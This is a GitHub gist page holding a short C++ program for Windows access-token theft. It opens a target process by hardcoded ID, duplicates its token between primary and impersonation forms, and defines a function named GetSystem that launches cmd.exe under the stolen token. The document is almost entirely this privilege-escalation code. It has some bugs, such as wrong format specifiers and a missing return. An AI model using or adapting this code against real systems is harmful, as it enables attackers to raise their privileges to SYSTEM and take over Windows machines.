Created
May 4, 2020 22:51
-
-
Save felamos/5ca3091454a152a848f0eafa2e3167ba to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <iostream> | |
#include <Windows.h> | |
#include <tchar.h> | |
HANDLE GetToken(DWORD pid) | |
{ | |
HANDLE f = OpenProcess(MAXIMUM_ALLOWED, NULL, pid); | |
if (!f) | |
{ | |
wprintf(L"Unable to get process %s\n", GetLastError()); | |
return FALSE; | |
} | |
HANDLE process_token; | |
if (!OpenProcessToken(f, MAXIMUM_ALLOWED, &process_token)) | |
{ | |
wprintf(L"Unable to get token %s\n", GetLastError()); | |
return FALSE; | |
} | |
return process_token; | |
} | |
BOOL GetTokenInfo(HANDLE process_token) | |
{ | |
// Check if Token is elevated | |
TOKEN_ELEVATION token; | |
DWORD dwsize; | |
if (!GetTokenInformation(process_token, TokenElevation, &token, sizeof(token), &dwsize)) | |
{ | |
wprintf(L"Unable to get token infomation %s\n", GetLastError()); | |
CloseHandle(process_token); | |
} | |
if (!dwsize) | |
{ | |
wprintf(L"Unable to get data %s\n", GetLastError()); | |
CloseHandle(process_token); | |
} | |
if (token.TokenIsElevated == NULL) | |
{ | |
wprintf(L"[*] Token is not Elevated\n"); | |
} | |
else | |
{ | |
wprintf(L"[*] Token is Elevated\n"); | |
} | |
// Check token type | |
wprintf(L"[*] Token is %s\n", IsTokenRestricted(process_token) ? L"restricted" : L"unrestricted"); | |
DWORD size; | |
TOKEN_TYPE type; | |
if (!GetTokenInformation(process_token, TokenType, &type, sizeof(TokenType), &size)) | |
{ | |
wprintf(L"Unable to get token type %s\n", GetLastError()); | |
CloseHandle(process_token); | |
} | |
if (type == TokenPrimary) | |
{ | |
wprintf(L"[*] Token is Primary\n"); | |
} | |
else | |
{ | |
wprintf(L"[*] Token is Impersonation\n"); | |
} | |
return TRUE; | |
} | |
HANDLE PrimaryToImpersonation(HANDLE process_token) | |
{ | |
HANDLE new_token; | |
if (!DuplicateTokenEx(process_token, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenImpersonation, &new_token)) | |
{ | |
DWORD LastError = GetLastError(); | |
wprintf(L"ERROR: Could not duplicate process token [%d]\n", LastError); | |
return FALSE; | |
} | |
return new_token; | |
} | |
HANDLE ImpersonationToPrimary(HANDLE process_token) | |
{ | |
HANDLE new_token; | |
if (!DuplicateTokenEx(process_token, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenPrimary, &new_token)) | |
{ | |
DWORD LastError = GetLastError(); | |
wprintf(L"ERROR: Could not duplicate process token [%d]\n", LastError); | |
return FALSE; | |
} | |
return new_token; | |
} | |
BOOL GetSystem(HANDLE process_token) | |
{ | |
STARTUPINFO start_info = {}; | |
PROCESS_INFORMATION process_info = {}; | |
BOOL ret; | |
ret = CreateProcessWithTokenW(process_token, LOGON_NETCREDENTIALS_ONLY, L"C:\\Windows\\System32\\cmd.exe", NULL, CREATE_NEW_CONSOLE, NULL, NULL, &start_info, &process_info); | |
if (!ret) | |
{ | |
DWORD lastError; | |
lastError = GetLastError(); | |
wprintf(L"CreateProcessWithTokenW: %d\n", lastError); | |
return 1; | |
} | |
} | |
int main() | |
{ | |
GetTokenInfo(PrimaryToImpersonation(GetToken(684))); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment